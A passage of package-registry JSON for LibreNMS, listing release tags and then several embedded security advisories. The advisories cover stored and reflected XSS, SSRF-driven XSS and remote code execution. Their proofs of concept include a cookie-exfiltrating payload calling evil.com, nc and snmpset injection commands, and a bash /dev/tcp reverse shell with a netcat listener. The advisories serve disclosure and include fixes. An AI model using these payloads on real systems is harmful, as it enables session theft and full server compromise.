e.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201601/manifests"},{"name":"201512","sha":"29bfe1a6aa0e9b07b25dd6a2c95237fc973c8d51","kind":"commit","published_at":"2015-12-06T18:02:38.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201512","html_url":"https://github.com/librenms/librenms/releases/tag/201512","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201512","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201512","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201512/manifests"},{"name":"201511","sha":"6e013c5a27e09b6433032d74cc41142745f832bb","kind":"commit","published_at":"2015-11-01T17:18:25.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201511","html_url":"https://github.com/librenms/librenms/releases/tag/201511","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201511","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201511","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201511/manifests"},{"name":"201510","sha":"fbca8584577ca80ea496d77033037bdb4ede5d6f","kind":"commit","published_at":"2015-10-11T19:08:52.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201510","html_url":"https://github.com/librenms/librenms/releases/tag/201510","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201510","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201510","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201510/manifests"},{"name":"201509","sha":"e0e4f97747729ec0b533efb683121894944fab6e","kind":"commit","published_at":"2015-09-06T16:13:08.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201509","html_url":"https://github.com/librenms/librenms/releases/tag/201509","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201509","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201509","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201509/manifests"},{"name":"201508","sha":"3a36fc8974d4d143da367775e83baf8fa1935c51","kind":"commit","published_at":"2015-08-02T15:00:02.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201508","html_url":"https://github.com/librenms/librenms/releases/tag/201508","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201508","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201508","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201508/manifests"},{"name":"201507","sha":"7803a33fa4fd50953cb679a104c777b2ae2eba7f","kind":"commit","published_at":"2015-07-05T20:18:33.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201507","html_url":"https://github.com/librenms/librenms/releases/tag/201507","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201507","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201507","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201507/manifests"},{"name":"201506","sha":"fe95301f43d543782394d09d49c9cb6ddccb035c","kind":"commit","published_at":"2015-06-08T20:17:53.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201506","html_url":"https://github.com/librenms/librenms/releases/tag/201506","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201506","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201506","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201506/manifests"},{"name":"201505","sha":"108125a666cc4be32935dbe1435e718344e5eb27","kind":"commit","published_at":"2015-05-28T22:07:30.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/201505","html_url":"https://github.com/librenms/librenms/releases/tag/201505","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@201505","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201505","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/201505/manifests"},{"name":"0.1","sha":"d49f4827fba84c5a50e12c73b1aa19650ac8b0de","kind":"commit","published_at":"2015-04-16T09:21:59.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/0.1","html_url":"https://github.com/librenms/librenms/releases/tag/0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-26T18:16:23.675Z","dependent_packages_count":1,"downloads":51215,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":4.705605876132212,"dependent_repos_count":18.5568428185976,"dependent_packages_count":9.718405305313064,"stargazers_count":0.1082524356798028,"forks_count":0.027250613138795624,"docker_downloads_count":null,"average":6.623271409772295},"purl":"pkg:composer/librenms/librenms","advisories":[{"uuid":"GSA_kwCzR0hTQS03dzhjLXFneGctbTdqeM4ABlfj","url":"https://github.com/advisories/GHSA-7w8c-qgxg-m7jx","title":"LibreNMS — Stored XSS via SNMP/Syslog Data in Legacy Templates","description":"## Summary\n\nMultiple legacy PHP template files in LibreNMS directly output SNMP-sourced and syslog-sourced data into HTML without escaping. An attacker who controls a monitored network device (via compromised SNMP agent or syslog sender) can inject arbitrary JavaScript that executes when any authenticated LibreNMS user views the affected pages.\n\n## Vulnerable Code\n\n### Location 1: Syslog `program` field (clearest instance)\n\n**File:** `includes/html/print-syslog.inc.php:11,13`\n\n```php\n$syslog_output .= '\u003ctd\u003e\u003cstrong\u003e' . $entry['program'] . ' : \u003c/strong\u003e ' . htmlspecialchars((string) $entry['msg']) . '\u003c/td\u003e';\n```\n\nThe `program` field is output without `htmlspecialchars()` while the adjacent `msg` field IS properly escaped. The `program` value comes from syslog messages received from monitored devices.\n\n### Location 2: Alert details `ifAlias` (highest impact — main alerts page)\n\n**File:** `includes/html/functions.inc.php:607`\n\n```php\n$fault_detail .= $tmp_alerts['ifAlias'] . '; ';\n```\n\nThe `ifAlias` (port description) comes from SNMP polling and is stored in the `ports` table. When a port-related alert fires, `format_alert_details()` renders it unescaped. Multiple other fields in this function are also unescaped: `isisISAdjIPAddrAddress` (line 598), `service_desc`/`service_message` (lines 656,658), `bgpPeerDescr` (line 672), `mempool_descr` (line 686), `app_type` (line 709).\n\n### Location 3: Health pages — `mempool_descr`, `storage_descr`, `sensor_descr`\n\n**File:** `includes/html/pages/device/health/mempool.inc.php:38`\n```php\necho \"\u003ch3 class='panel-title'\u003e{$mempool-\u003emempool_descr} ...\";\n```\n\n**File:** `includes/html/pages/device/health/storage.inc.php:27`\n```php\necho \"\u003ch3 class='panel-title'\u003e{$drive['storage_descr']} ...\";\n```\n\n**File:** `includes/html/pages/device/health/sensors.inc.php:29`\n```php\necho \"\u003ch3 class='panel-title'\u003e$sensor_descr ...\";\n```\n\nAll three health page templates output SNMP-polled descriptions directly into `\u003ch3\u003e` tags without escaping.\n\n### Location 4: Pseudowires `ifAlias`\n\n**File:** `includes/html/pages/pseudowires.inc.php:76`\n```php\necho \"\u003ctr ...\u003e\u003ctd colspan=2\u003e\" . $pw_a['ifAlias'] . '\u003c/td\u003e\u003ctd colspan=2\u003e' . $pw_b['ifAlias'] . '\u003c/td\u003e\u003c/tr\u003e';\n```\n\n### Location 5: VRF page `ifAlias`\n\n**File:** `includes/html/pages/routing/vrf.inc.php:165`\n```php\necho \"\u003cdiv style='font-size: 9px;'\u003e\" . substr((string) short_port_descr($port['ifAlias']), 0, 22) . '\u003c/div\u003e';\n```\n\n## Data Flow\n\n```\nAttacker-controlled SNMP device/syslog source\n  → SNMP polling stores ifAlias/mempool_descr/etc in DB (no sanitization on write)\n  → OR syslog receiver stores program field in syslog table\n  → Authenticated user views alerts/health/syslog page\n  → Legacy PHP template echoes raw value into HTML\n  → XSS executes in victim's browser session\n```\n\n## Attack Scenario\n\n1. Attacker compromises or controls a network device monitored by LibreNMS\n2. Attacker configures the device's SNMP interface description (ifAlias) to: `\u003cimg src=x onerror=\"fetch('https://evil.com/'+document.cookie)\"\u003e`\n3. LibreNMS polls the device via SNMP and stores the malicious ifAlias in the `ports` table\n4. When any alert fires for this port, the XSS payload executes for every authenticated user viewing the alerts page\n5. Alternatively: attacker sends syslog messages with XSS in the program field, targeting the syslog viewer page\n\n## PoC\n\n### Syslog vector (simplest)\n```bash\n# Send syslog message with XSS in program field\n# Assuming LibreNMS syslog receiver is at 10.0.0.1:514\necho '\u003c14\u003eMar 20 12:00:00 rogue-device \u003cimg/src=x onerror=alert(document.domain)\u003e: test message' | nc -u 10.0.0.1 514\n```\n\n### SNMP vector\n```bash\n# On attacker-controlled SNMP device, set interface description:\n# snmpset -v2c -c private localhost IF-MIB::ifAlias.1 s '\u003cimg src=x onerror=alert(document.cookie)\u003e'\n# LibreNMS will poll this during next discovery/polling cycle\n```\n\n## Contrast with Properly Escaped Code\n\nNewer Blade templates and some legacy code properly escape SNMP data:\n- `includes/html/dev-overview-data.inc.php` uses `Clean::html()` for sysDescr, sysName, hardware\n- `app/Http/Controllers/Device/Tabs/PortsController.php` uses `htmlentities()` on ifAlias\n- `app/Http/Controllers/Table/EventlogController.php:97` uses `htmlspecialchars()` on message\n- All Blade templates use `{{ }}` auto-escaping\n\nThe vulnerability exists specifically in the legacy `includes/html/` PHP files that have not been migrated to Blade.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-26T18:05:46.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-7w8c-qgxg-m7jx","https://github.com/librenms/librenms/pull/19660","https://github.com/librenms/librenms/commit/6782af940c3c495755923b520a302f3a1cb1ce6b","https://github.com/librenms/librenms/releases/tag/26.5.0","https://github.com/librenms/librenms/releases/tag/26.8.1","https://github.com/advisories/GHSA-7w8c-qgxg-m7jx"],"source_kind":"github","identifiers":["GHSA-7w8c-qgxg-m7jx"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-26T19:00:10.889Z","updated_at":"2026-09-03T00:00:20.934Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhjLXFneGctbTdqeM4ABlfj","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03dzhjLXFneGctbTdqeM4ABlfj","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.5.0","vulnerable_version_range":"\u003c 26.5.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhjLXFneGctbTdqeM4ABlfj/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03Z3d3LXg3ZmgtamY5as4ABkeE","url":"https://github.com/advisories/GHSA-7gww-x7fh-jf9j","title":"LibreNMS: SSRF-driven stored XSS via Oxidized API response fields in device showconfig page","description":"### Summary\nThe Oxidized integration URL (`oxidized.url`) is admin-configurable. LibreNMS fetches device info and version history from that URL and renders JSON fields (`name`, `ip`, `model`, `author`, commit message) into HTML without `htmlspecialchars()`. An admin pointing the URL at an attacker-controlled server achieves persistent XSS affecting all users who view any device's showconfig tab.\n\n### CVSS\n`CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N` — **8.1 High**\n\n### Details\n```php\n// includes/html/pages/device/showconfig.inc.php:276-278\necho '\u003cli ...\u003e\u003cstrong\u003eNode:\u003c/strong\u003e ' . $node_info['name'] . '\u003c/li\u003e';\necho '\u003cli ...\u003e\u003cstrong\u003eIP:\u003c/strong\u003e '   . $node_info['ip']   . '\u003c/li\u003e';\necho '\u003cli ...\u003e\u003cstrong\u003eModel:\u003c/strong\u003e '. $node_info['model'] . '\u003c/li\u003e';\n// lines 349, 353: author and commit message also unescaped\n```\n\n### Attack chain\n1. Admin sets `oxidized.url` to `http://attacker.example.com/`.\n2. Attacker server returns `{\"name\":\"\u003cimg src=x onerror=alert(1)\u003e\",\"ip\":\"x\",\"model\":\"x\"}`.\n3. Any user viewing any device showconfig tab triggers the XSS.\n\n### PoC\nMock Oxidized server confirmed in response:\n```\n[!!!] CONFIRMED — ...\u003cstrong\u003eNode:\u003c/strong\u003e \u003cimg src=x onerror=\"alert('SSRF-XSS-oxidized')\"\u003e...\n```\n\n### Fix\n```php\necho '\u003cli ...\u003e\u003cstrong\u003eNode:\u003c/strong\u003e ' . htmlspecialchars($node_info['name'], ENT_QUOTES, 'UTF-8') . '\u003c/li\u003e';\n```\nApply to all fields from `$node_info`, `$author`, `$msg`.\n\n### Prerequisite\nAdmin session. Oxidized integration must be enabled.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-18T21:17:23.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-7gww-x7fh-jf9j","https://github.com/librenms/librenms/releases/tag/26.7.0","https://github.com/advisories/GHSA-7gww-x7fh-jf9j"],"source_kind":"github","identifiers":["GHSA-7gww-x7fh-jf9j"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-18T22:00:07.981Z","updated_at":"2026-09-03T00:00:28.273Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Z3d3LXg3ZmgtamY5as4ABkeE","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03Z3d3LXg3ZmgtamY5as4ABkeE","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.7.0","vulnerable_version_range":"\u003c 26.7.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Z3d3LXg3ZmgtamY5as4ABkeE/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03Y2o1LXY0cHAtdjYzMs4ABkeD","url":"https://github.com/advisories/GHSA-7cj5-v4pp-v632","title":"LibreNMS: Stored XSS via graph_descr admin config settings echoed without escaping to all authenticated users","description":"### Summary\nThe `graph_descr.\u003cgraphtype\u003e` family of settings is echoed verbatim without `htmlspecialchars()` in `includes/html/pages/graphs.inc.php:194`. Any admin can store a malicious HTML payload that executes in every authenticated user's browser viewing that graph type.\n\n### CVSS\n`CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N` — **4.8 Medium**\n\n### Details\n```php\n// graphs.inc.php:194\necho LibrenmsConfig::get('graph_descr.' . $vars['type']);\n```\n\n### PoC\n```\nPUT /settings/graph_descr.device_processor\n{\"value\": \"\u003cimg src=x onerror=\\\"alert('ADV-15')\\\"\u003e\"}\n\nGET /graphs?type=device_processor\n→ \u003cimg src=x onerror=\"alert('ADV-15')\"\u003e\n```\n\n### Fix\n```php\necho htmlspecialchars(LibrenmsConfig::get('graph_descr.' . $vars['type']), ENT_QUOTES, 'UTF-8');\n```\n\n### Prerequisite\nAdmin session to set the config value.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-18T21:17:20.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-7cj5-v4pp-v632","https://github.com/librenms/librenms/releases/tag/26.7.0","https://github.com/advisories/GHSA-7cj5-v4pp-v632"],"source_kind":"github","identifiers":["GHSA-7cj5-v4pp-v632"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-18T22:00:07.981Z","updated_at":"2026-09-03T00:00:28.273Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Y2o1LXY0cHAtdjYzMs4ABkeD","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03Y2o1LXY0cHAtdjYzMs4ABkeD","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.7.0","vulnerable_version_range":"\u003c 26.7.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Y2o1LXY0cHAtdjYzMs4ABkeD/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qZjI0LThnMmgtMndnN84ABkeC","url":"https://github.com/advisories/GHSA-jf24-8g2h-2wg7","title":"LibreNMS Vulnerable to Remote Code Execution via AboutController","description":"# Remote Code Execution via AboutController in LibreNMS\n\n## Summary\n\nA Remote Code Execution (RCE) vulnerability exists in LibreNMS 26.3.1 through the AboutController. An authenticated administrator can manipulate the `snmpget` configuration parameter to execute arbitrary system commands. When the `/about` endpoint is accessed, the application executes the configured binary path via `shell_exec()` without proper validation. This vulnerability leads to complete server compromise, allowing attackers to establish reverse shells, exfiltrate sensitive data, and maintain persistent access.\n\n**Severity:** High (CVSS 7.2)\n**Attack Vector:** Network\n**Privileges Required:** High (Administrator)\n**User Interaction:** None\n**Impact:** Complete system compromise with web server privileges\n\n---\n\n## Details\n\n### Vulnerable Code\n\n**File:** `app/Http/Controllers/AboutController.php`\n**Line:** 85\n\n```php\n'version_netsnmp' =\u003e str_replace('version: ', '', \n    rtrim(shell_exec(LibrenmsConfig::get('snmpget', 'snmpget') . ' -V 2\u003e\u00261'))),\n```\n\n### Root Cause\n\nThe AboutController retrieves the `snmpget` configuration value from the database and directly concatenates it into a `shell_exec()` call without proper validation or escaping. While the `sanitizePath()` function attempts to validate executable paths by blocking special characters (`;`, `` ` ``, `#`, `$`, `|`, `\u0026`, `'`, `\"`, `\u003e`, `\u003c`, `(`), it only prevents direct command injection. It does NOT prevent an attacker from pointing the configuration to a malicious executable file already present on the system.\n\n### Configuration Access\n\nThe `snmpget` configuration can be modified through the web interface:\n\n- **Endpoint:** `PUT /settings/snmpget`\n- **Controller:** `SettingsController::update()`\n- **Required Privileges:** Administrator\n- **Config Definition:** `resources/definitions/config_definitions.json`\n\n```json\n\"snmpget\": {\n    \"default\": \"/usr/bin/snmpget\",\n    \"type\": \"executable\"\n}\n```\n\n### Validation Analysis\n\nThe `sanitizePath()` function in `DynamicConfigItem.php`:\n\n```php\n// LibreNMS/Util/DynamicConfigItem.php:277-284\nprivate function sanitizePath(string $path): string|false\n{\n    if (preg_match('/[`;#$|\u0026\\'\"\u003e\u003c(]/', $path)) {\n        return false;\n    }\n    return realpath($path);\n}\n\n// LibreNMS/Util/DynamicConfigItem.php:107-110\n} elseif ($this-\u003etype === 'executable') {\n    $value == $this-\u003esanitizePath($value);\n    return $value !== false \u0026\u0026 is_file($value) \u0026\u0026 is_executable($value);\n}\n```\n### Attack Scenarios\n\n| Scenario | Description |\n|----------|-------------|\n| **Insider Threat** | Internal admin creates malicious file → updates config → RCE |\n| **Privilege Escalation** | Attacker with limited access → creates file → full RCE |\n| **Supply Chain** | Malicious package installs binary → admin uses it → RCE |\n\n---\n\n## PoC\n\n### Prerequisites\n\n- Valid administrator credentials for LibreNMS web interface\n- Ability to create a file on the target system (via prior access, SSH, or another vulnerability)\n\n### Proof of Concept - Reverse Shell\n\n#### Step 1: Create Malicious Executable\n\nCreate a reverse shell payload that connects back to the attacker:\n\n```bash\nATTACKER_IP=\"172.16.69.144\"\nATTACKER_PORT=9001\n\nbash -c 'bash -i \u003e\u0026 /dev/tcp/'$ATTACKER_IP'/'$ATTACKER_PORT' 0\u003e\u00261' 2\u003e/dev/null\n```\n\nSave this as `/tmp/rev_shell.sh` and make it executable:\n```bash\nchmod +x /tmp/rev_shell.sh\n```\n\n#### Step 2: Setup Netcat Listener\n\nOn your attacking machine, start a netcat listener:\n\n```bash\nnc -lvnp 9001\n```\n\n#### Step 3: Update Configuration via Web Interface\n\nLogin to LibreNMS web interface as administrator and navigate to:\n- **Settings** → **External** → **Binaries**\n- Locate **snmpget** configuration\n- Update the value to: `/tmp/rev_shell.sh`\n- Click **Save**\n\n\u003cimg width=\"1919\" height=\"848\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f4f78425-396e-4dc3-a11f-a33f0f6f7fa3\" /\u003e\n\n#### Step 4: Trigger RCE\n\nAccess the `/about` endpoint to execute the malicious binary:\n\n\u003cimg width=\"1861\" height=\"957\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4d3da8b9-1ec4-4703-bede-9e485e45726b\" /\u003e\n\n---\n\n## Impact Summary\n\n| Category | Level | Description |\n|----------|-------|-------------|\n| **Confidentiality** | HIGH | Read config files, database credentials, SSH keys |\n| **Integrity** | HIGH | Create webshells, backdoors, modify code |\n| **Availability** | HIGH | Disrupt services, delete data, stop monitoring |\n| **Scope** | CHANGED | Compromise extends beyond application to system |\n\n### Who Is Impacted\n- LibreNMS installations where attacker has admin credentials AND file system access\n- Organizations using LibreNMS for network monitoring\n- Systems monitored by LibreNMS (lateral movement risk)\n\n\n---\n\n## Remediation\n\nReplace `shell_exec()` with Symfony Process component:\n\n```php\n// BEFORE (vulnerable):\nshell_exec(LibrenmsConfig::get('snmpget', 'snmpget') . ' -V 2\u003e\u00261')\n\n// AFTER (safe):\n$process = new Process([LibrenmsConfig::get('snmpget', 'snmpget'), '-V']);\n$process-\u003erun();\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-18T21:17:11.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.4,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H","references":["https://github.com/librenms/librenms/security/advisories/GHSA-jf24-8g2h-2wg7","https://github.com/librenms/librenms/releases/tag/26.5.0","https://github.com/advisories/GHSA-jf24-8g2h-2wg7"],"source_kind":"github","identifiers":["GHSA-jf24-8g2h-2wg7"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-18T22:00:07.981Z","updated_at":"2026-09-03T00:00:28.274Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZjI0LThnMmgtMndnN84ABkeC","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qZjI0LThnMmgtMndnN84ABkeC","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.5.0","vulnerable_version_range":"\u003c 26.5.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZjI0LThnMmgtMndnN84ABkeC/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jOWZ2LWNnbW0tMndnN84ABkc0","url":"https://github.com/advisories/GHSA-c9fv-cgmm-2wg7","title":"LibreNMS Vulnerable to Remote Code Execution by Signal Alert Transportation module","description":"### Summary\nA vulnerability has been identified that allows an authenticated administrator to execute arbitrary code on the host server. By adding an alert transport entry, an attacker with administrative privileges can execute malicious commands.\n\n### Details\nThe vulnerability is caused by an unsafe `exec` call in `deliverAlert` function of `LibreNMS/Alert/Transport/Signal.php`. Escapes for the path of `signal-cli` and the `Recipient` field are insufficient to prevent command-line injection. \n\nThe `composer_wrapper.php` under `scripts` is also vulnerable to command injection (unsafe `exec` calls) by passing the injected command as an argument, and it is accepting arguments passed by `deliverAlert`.\n\nBy chaining these unsafe `exec` calls, malicious admin user can execute any executables in the server's filesystem.\n\n### PoC\n\n1. Under Dashboard -\u003e Alert -\u003e Alert Transports\n\n\u003cimg width=\"282\" height=\"273\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b72f55b0-b782-47d0-b4f7-75f498019345\" /\u003e\n\n2. Create a new Alert Transport entry.\n    a. Select `Signal` as `Transport type`.\n    b. Put `../scripts/composer_wrapper.php` into `Path`.\n    c. Put the command to execute under `Recipient` with `;` at the start and the end of string.\n\n\u003cimg width=\"767\" height=\"391\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5e34bfa8-4bd5-40cb-9624-0d40e40ccdc5\" /\u003e\n\n3. . Click `Save Transport`, and after the popup closed, click `Test Transport` button under `Action` of the created Alert Transport entry.\n\n\u003cimg width=\"172\" height=\"90\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7f83db07-fbf9-4be6-b247-533a6d7b9828\" /\u003e\n\n4. The command is executed.\n\u003cimg width=\"532\" height=\"216\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d595b0fe-10cc-4050-b4b9-d290b658689d\" /\u003e\n\n### Impact\nThis vulnerability allows a malicious actor to achieve Remote Code Execution (RCE), potentially leading to complete system compromise, data exfiltration, or lateral movement within the network.\n\n### Remediation Advice\nEscape user inputs, and avoid passing them directly into `exec` function. (`scripts/composer_wrapper.php`)\nAvoid setting executable paths directly in web interface. Instead, use a config value, and only allow setting executable paths by command line interface. (`LibreNMS/Alert/Transport/Signal.php`)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-18T17:59:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-c9fv-cgmm-2wg7","https://github.com/librenms/librenms/releases/tag/26.5.0","https://github.com/advisories/GHSA-c9fv-cgmm-2wg7"],"source_kind":"github","identifiers":["GHSA-c9fv-cgmm-2wg7","CVE-2026-55182"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-18T18:00:07.076Z","updated_at":"2026-09-03T00:00:28.288Z","epss_percentage":0.01128,"epss_percentile":0.6399,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jOWZ2LWNnbW0tMndnN84ABkc0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jOWZ2LWNnbW0tMndnN84ABkc0","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.5.0","vulnerable_version_range":"\u003e= 21.6.0, \u003c 26.5.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jOWZ2LWNnbW0tMndnN84ABkc0/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qbXFtLWY4cTQtdjd3eM4ABihH","url":"https://github.com/advisories/GHSA-jmqm-f8q4-v7wx","title":"LibreNMS: Reflected XSS via Proxmox instance/vmid GET parameters injected into document.title JavaScript assignment","description":"### Summary\n`LegacyController.php:75` writes the page title into a `document.title` JS assignment using string interpolation. `apps/proxmox.inc.php` pushes `$vars['instance']` and `$vars['vmid']` (GET params, only `strip_tags()` applied) directly into `$pagetitle`. A single quote terminates the JS string, executing arbitrary script.\n\n### Details\n```php\n// LegacyController.php:75\n$html .= \"\u003cscript\u003e\\ndocument.title = '$title';\\n\u003c/script\u003e\";\n\n// proxmox.inc.php:38,42\n$pagetitle[] = $instance;     // GET ?instance=\n$pagetitle[] = $vars['vmid']; // GET ?vmid=\n```\n\n### PoC\n```\nhttp://target/apps?app=proxmox\u0026instance=%27%3Balert%28document.cookie%29%3B//\n\nConfirmed in response:\ndocument.title = 'Apps - Proxmox - ';alert(document.cookie);// - LibreNMS';\n```\n\n### Fix\n```php\n// LegacyController.php:75\n$html .= \"\u003cscript\u003e\\ndocument.title = \" . json_encode($title) . \";\\n\u003c/script\u003e\";\n```\nAlso wrap `$instance` and `$vars['vmid']` in `htmlspecialchars()` in proxmox.inc.php.\n\n### Prerequisite\nAny authenticated session. Victim must follow a crafted link.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-12T15:16:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-jmqm-f8q4-v7wx","https://github.com/librenms/librenms/releases/tag/26.5.0","https://github.com/advisories/GHSA-jmqm-f8q4-v7wx"],"source_kind":"github","identifiers":["GHSA-jmqm-f8q4-v7wx","CVE-2026-45694"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-12T16:00:08.101Z","updated_at":"2026-09-03T00:00:34.111Z","epss_percentage":0.00146,"epss_percentile":0.04185,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qbXFtLWY4cTQtdjd3eM4ABihH","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qbXFtLWY4cTQtdjd3eM4ABihH","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"2